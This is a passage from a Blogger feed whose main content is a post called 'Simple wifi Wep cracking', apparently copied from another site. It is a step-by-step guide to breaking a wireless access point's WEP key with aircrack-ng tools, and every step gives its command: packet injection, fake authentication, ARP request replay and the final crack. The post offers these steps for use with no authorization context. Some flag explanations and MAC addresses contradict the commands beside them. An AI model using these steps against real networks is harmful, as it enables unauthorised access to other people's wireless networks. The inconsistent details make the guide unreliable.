&lt;span style=&quot;color: blue;&quot;&gt;&lt;strong&gt;Feel Free To Share This Post!&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/2401268621164265647/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/make-your-keyboard-go-disco.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2401268621164265647'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/2401268621164265647'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/make-your-keyboard-go-disco.html' title='Make your keyboard go disco'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-1982865788183152189</id><published>2013-07-17T08:38:00.002-07:00</published><updated>2013-07-17T08:46:19.087-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="wireless"/><title type='text'>Simple wifi Wep cracking</title><content type='html'>&lt;h3 left=&quot;&quot; style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Overview&lt;/span&gt;&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;strong&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Equipments used&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Wifi Adaptor : Alfa AWUS036H (available on eBay &amp;amp; Amazon)&lt;br /&gt;Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 1&lt;/strong&gt;&amp;nbsp;– Start the wireless interface in monitor mode on AP channel&lt;/span&gt;&lt;/h2&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;airmon-ng start wlan1 6&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;starts wifi interface in channel 6&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&amp;nbsp;– Test Wireless Device Packet Injection&lt;/span&gt;&lt;/h2&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E &amp;nbsp;wlan1&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-9 means injection&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-a 00:1B:11:24:27:2E is the access point MAC address&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 3&lt;/strong&gt;&amp;nbsp;– Start airodump-ng to capture the IVs&lt;/span&gt;&lt;/h2&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 4&lt;/strong&gt;&amp;nbsp;– Use aireplay-ng to do a fake authentication with the access point&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-1 means fake authentication&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;0 reassociation timing in seconds&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-e infosec is the wireless network name&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-a 00:14:6C:7E:40:80 is the access point MAC address&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-h 00:0F:B5:88:AC:82 is our card MAC address&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;OR&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2 – Reauthenticate every 2 seconds.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-q 10 – Send keep alive packets every 10 seconds.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Troubleshooting Tips&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;strong&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Run:&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;You would then look for error messages.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Run:&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;“tcpdump -n -e -s0 -vvv -i wlan1”&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Here is a typical tcpdump error message you are looking for:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 &amp;nbsp; DeAuthentication: Class 3 frame received from nonassociated station&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 5&lt;/strong&gt;&amp;nbsp;– Start aireplay-ng in ARP request replay mode&lt;/span&gt;&lt;/h2&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;h2 style=&quot;color: #333333; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;strong&gt;Step 6&lt;/strong&gt;&amp;nbsp;– Run aircrack-ng to obtain the WEP key&lt;/span&gt;&lt;/h2&gt;
&lt;blockquote style=&quot;background-image: url(http://hackingarticles.com/wp-content/themes/origin/images/quote.png); background-position: 0px 4px; background-repeat: no-repeat no-repeat; color: #aaaaaa; font-family: Georgia, &#39;Times New Roman&#39;, Times, serif; font-style: italic; margin: 0px 1.692307em; overflow: hidden; padding: 0px 0px 0px 40px; quotes: none;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;aircrack-ng -b 00:1B:11:24:27:2E output*.cap&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;All Done!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h4&gt;
&lt;b&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;a href=&quot;http://hackingarticles.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;taken from&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/1982865788183152189/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/simple-wifi-wep-cracking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/1982865788183152189'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/1982865788183152189'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/simple-wifi-wep-cracking.html' title='Simple wifi Wep cracking'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>